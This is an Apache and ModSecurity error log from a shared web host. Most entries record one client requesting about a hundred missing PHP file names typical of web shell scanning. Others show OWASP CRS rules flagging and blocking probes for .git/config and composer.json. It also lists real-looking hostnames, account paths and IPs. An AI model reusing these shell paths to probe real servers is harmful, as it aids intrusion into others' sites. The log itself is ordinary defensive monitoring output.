[Mon May 11 23:14:41.675688 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/xstelth.php
[Mon May 11 23:14:41.906024 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/min.php
[Mon May 11 23:14:42.622189 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/geforce.php
[Mon May 11 23:14:42.855970 2026] [:error] [pid 1630927:tid 1630935] [client 172.212.136.43:12964] File does not exist: /home/piregwan/public_html/moshou.php
[Mon May 11 23:15:10.080056 2026] [security2:error] [pid 1606352:tid 1606431] [client 43.166.237.57:56698] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/groupes/"] [unique_id "agJG3no_DFxNSZVmaX3gbAAAAMw"]
[Mon May 11 23:15:13.603927 2026] [security2:error] [pid 1588898:tid 1588908] [client 49.51.180.2:38456] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/xmlrpc.php"] [unique_id "agJG4aFW67LJTsgN3jQcpwAAAAk"]
[Mon May 11 23:15:30.441768 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/file60.php
[Mon May 11 23:15:31.193787 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/wp-k7djufwez2.php
[Mon May 11 23:15:31.522059 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/bc.php
[Mon May 11 23:15:31.803965 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/100.php
[Mon May 11 23:15:32.053438 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/xmu.php
[Mon May 11 23:15:32.290691 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/bob.php
[Mon May 11 23:15:32.636017 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/av.php
[Mon May 11 23:15:32.889289 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/casp1.php
[Mon May 11 23:15:33.186486 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/file6.php
[Mon May 11 23:15:33.462999 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/xs.php
[Mon May 11 23:15:33.757705 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/xxa.php
[Mon May 11 23:15:34.014970 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/3369.php
[Mon May 11 23:15:34.269832 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/dostshell.php
[Mon May 11 23:15:34.529852 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/zoper1.php
[Mon May 11 23:15:34.778398 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/77.php
[Mon May 11 23:15:35.031117 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/wp-kz.php
[Mon May 11 23:15:35.525253 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/file6.php
[Mon May 11 23:15:35.943990 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/zogy1.php
[Mon May 11 23:15:36.183326 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/19.php
[Mon May 11 23:15:36.423210 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/11.php
[Mon May 11 23:15:36.715409 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/w.php
[Mon May 11 23:15:37.187885 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/7.php
[Mon May 11 23:15:37.444095 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/ortasekerli1.php
[Mon May 11 23:15:37.712296 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/xxx.php
[Mon May 11 23:15:37.951868 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/cdxadmin.php
[Mon May 11 23:15:38.598982 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/gecko.php
[Mon May 11 23:15:38.839714 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/fone1.php
[Mon May 11 23:15:39.250731 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/cilus.php
[Mon May 11 23:15:39.525628 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/adminfuns.php
[Mon May 11 23:15:39.911082 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/tires.php
[Mon May 11 23:15:40.163326 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/wp-tiroto.php
[Mon May 11 23:15:40.399876 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/a7.php
[Mon May 11 23:15:40.805832 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/1.php
[Mon May 11 23:15:40.974682 2026] [security2:error] [pid 1630927:tid 1630934] [client 54.91.164.107:60958] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.naturedetres.fr"] [uri "/.git/config"] [unique_id "agJG_GiGYYhUwDaJINmdBAAAAUQ"]
[Mon May 11 23:15:40.974875 2026] [security2:error] [pid 1630927:tid 1630934] [client 54.91.164.107:60958] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.naturedetres.fr"] [uri "/.git/config"] [unique_id "agJG_GiGYYhUwDaJINmdBAAAAUQ"]
[Mon May 11 23:15:40.975911 2026] [security2:error] [pid 1630927:tid 1630934] [client 54.91.164.107:60958] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.naturedetres.fr"] [uri "/.git/config"] [unique_id "agJG_GiGYYhUwDaJINmdBAAAAUQ"]
[Mon May 11 23:15:41.300894 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/drykl.php
[Mon May 11 23:15:41.554900 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/BDKR28WP.php
[Mon May 11 23:15:41.807025 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/mifta.php
[Mon May 11 23:15:42.132190 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/xwx1.php
[Mon May 11 23:15:42.368426 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/a1.php
[Mon May 11 23:15:42.604803 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/d.php
[Mon May 11 23:15:42.915726 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/edit.php
[Mon May 11 23:15:43.274325 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/xff.php
[Mon May 11 23:15:43.514557 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/bal.php
[Mon May 11 23:15:43.760058 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/xltt.php
[Mon May 11 23:15:44.008963 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/son.php
[Mon May 11 23:15:44.663580 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/doc.php
[Mon May 11 23:15:45.128064 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/zo.php
[Mon May 11 23:15:45.388497 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/xper1.php
[Mon May 11 23:15:45.689623 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/tiny.php
[Mon May 11 23:15:45.923798 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/bthil.php
[Mon May 11 23:15:46.160094 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/s1.php
[Mon May 11 23:15:46.450788 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/de.php
[Mon May 11 23:15:46.957142 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/axe.php
[Mon May 11 23:15:47.312694 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/roksad1.php
[Mon May 11 23:15:47.627387 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/aj11.php
[Mon May 11 23:15:47.885799 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/yuzuru1.php
[Mon May 11 23:15:48.240571 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/1a.php
[Mon May 11 23:15:48.480888 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/gelio1.php
[Mon May 11 23:15:48.730095 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/2.php
[Mon May 11 23:15:49.127340 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/sky.php
[Mon May 11 23:15:49.767912 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/man.php
[Mon May 11 23:15:50.108194 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/ws85.php
[Mon May 11 23:15:50.632212 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/Sanskrit.php
[Mon May 11 23:15:50.876567 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/ms-edit.php
[Mon May 11 23:15:51.307718 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/dass.php
[Mon May 11 23:15:51.604438 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/7.php
[Mon May 11 23:15:51.840583 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/cu.php
[Mon May 11 23:15:52.233704 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/ganja.php
[Mon May 11 23:15:52.468066 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/pp.php
[Mon May 11 23:15:52.772146 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/card.php
[Mon May 11 23:15:53.117712 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/packsin1.php
[Mon May 11 23:15:53.384984 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/wps.php
[Mon May 11 23:15:53.827758 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/wgift1.php
[Mon May 11 23:15:54.167842 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/mar.php
[Mon May 11 23:15:54.418249 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/img.php
[Mon May 11 23:15:54.652455 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/themes.php
[Mon May 11 23:15:55.234383 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/acp.php
[Mon May 11 23:15:55.647269 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/error_log.php
[Mon May 11 23:15:55.998970 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/zdd.php
[Mon May 11 23:15:56.233117 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/link.php
[Mon May 11 23:15:56.639465 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/sallu.php
[Mon May 11 23:15:56.914033 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/aboute.php
[Mon May 11 23:15:57.152696 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/ayk.php
[Mon May 11 23:15:57.440558 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/one.php
[Mon May 11 23:15:57.875367 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/press.php
[Mon May 11 23:15:58.174088 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/ng.php
[Mon May 11 23:15:58.530535 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/tx79.php
[Mon May 11 23:15:59.359052 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/wp-block.php
[Mon May 11 23:15:59.594030 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/8.php
[Mon May 11 23:15:59.833001 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/options.php
[Mon May 11 23:16:00.067262 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/admlo.php
[Mon May 11 23:16:00.320811 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/x=34.php
[Mon May 11 23:16:00.623362 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/tramuibs.php
[Mon May 11 23:16:00.887267 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/view.php
[Mon May 11 23:16:01.134135 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/aa.php
[Mon May 11 23:16:01.412879 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/x402.php
[Mon May 11 23:16:01.650872 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/lib.php
[Mon May 11 23:16:02.011908 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/ws78.php
[Mon May 11 23:16:02.250174 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/f5.php
[Mon May 11 23:16:02.512430 2026] [:error] [pid 1605480:tid 1605534] [client 172.212.136.43:39212] File does not exist: /home/piregwan/public_html/alpha.php
[Mon May 11 23:16:05.829501 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/son1.php
[Mon May 11 23:16:06.070720 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/ggb.php
[Mon May 11 23:16:06.334848 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/amxloxxr.php
[Mon May 11 23:16:06.622320 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/ss.php
[Mon May 11 23:16:06.867845 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/sadcut1.php
[Mon May 11 23:16:07.112350 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/rh.php
[Mon May 11 23:16:07.361069 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/99.php
[Mon May 11 23:16:07.773626 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/layout.php
[Mon May 11 23:16:08.018728 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/12.php
[Mon May 11 23:16:08.282744 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/fs.php
[Mon May 11 23:16:08.522888 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/insta.php
[Mon May 11 23:16:08.762423 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/simple.php
[Mon May 11 23:16:09.001096 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/ws81.php
[Mon May 11 23:16:09.463095 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/av.php
[Mon May 11 23:16:09.725979 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/xfile25.php
[Mon May 11 23:16:09.978126 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/wpxml.php
[Mon May 11 23:16:10.361983 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/xstelth.php
[Mon May 11 23:16:10.793310 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/min.php
[Mon May 11 23:16:11.032811 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/geforce.php
[Mon May 11 23:16:11.590634 2026] [:error] [pid 1605480:tid 1605540] [client 172.212.136.43:19804] File does not exist: /home/piregwan/public_html/moshou.php
[Mon May 11 23:16:49.523435 2026] [security2:error] [pid 1605480:tid 1605529] [client 49.51.33.159:33444] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation-facility/transats/"] [unique_id "agJHQR2Cvzd_nyNfUm8PkgAAAQc"]
[Mon May 11 23:17:05.184769 2026] [ssl:error] [pid 1630927:tid 1630946] (EAI 2)Name or service not known: [client 54.209.197.15:55212] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 23:17:05.185012 2026] [ssl:error] [pid 1630927:tid 1630946] AH01941: stapling_renew_response: responder error
[Mon May 11 23:17:07.839039 2026] [ssl:error] [pid 1630927:tid 1630935] (EAI 2)Name or service not known: [client 54.209.197.15:55228] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 23:17:07.839098 2026] [ssl:error] [pid 1630927:tid 1630935] AH01941: stapling_renew_response: responder error
[Mon May 11 23:17:15.512002 2026] [security2:error] [pid 1605480:tid 1605539] [client 43.159.132.207:60974] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/nature/cabane-a-oiseaux-revival/"] [unique_id "agJHWx2Cvzd_nyNfUm8PtgAAARE"]
[Mon May 11 23:17:19.245710 2026] [ssl:error] [pid 1590352:tid 1590402] (EAI 2)Name or service not known: [client 74.7.228.21:34534] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 23:17:19.245763 2026] [ssl:error] [pid 1590352:tid 1590402] AH01941: stapling_renew_response: responder error
[Mon May 11 23:17:21.494255 2026] [security2:error] [pid 1601130:tid 1601164] [client 170.106.161.78:42140] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/on-vous-attend-a-la-brasserie-pour-les-10-ans-de-la-baujue/"] [unique_id "agJHYXEgAO_835W6c1mm0wAAAE4"]
[Mon May 11 23:17:41.402135 2026] [core:crit] [pid 1606352:tid 1606433] (13)Permission denied: [client 20.9.31.235:10247] AH00529: /home/krakouka/public_html/wordpress/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home/krakouka/public_html/wordpress/' is executable
[Mon May 11 23:18:07.470107 2026] [security2:error] [pid 1590352:tid 1590411] [client 43.157.172.39:57124] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.portail.tct-telecom.fr"] [uri "/user/passwordforgotten.php"] [unique_id "agJHj61q0G_aXAqWauQK2gAAAJM"]
[Mon May 11 23:18:55.583562 2026] [authz_core:error] [pid 1606352:tid 1606430] [client 20.9.31.235:10779] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/error_log
[Mon May 11 23:18:58.972213 2026] [security2:error] [pid 1605480:tid 1605539] [client 47.128.46.8:47744] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /composer.json.sorry"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "missmandarine.com"] [uri "/composer.json.sorry"] [unique_id "agJHwh2Cvzd_nyNfUm8QJQAAARE"]
[Mon May 11 23:18:58.972470 2026] [security2:error] [pid 1605480:tid 1605539] [client 47.128.46.8:47744] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/composer.json.sorry"] [unique_id "agJHwh2Cvzd_nyNfUm8QJQAAARE"]
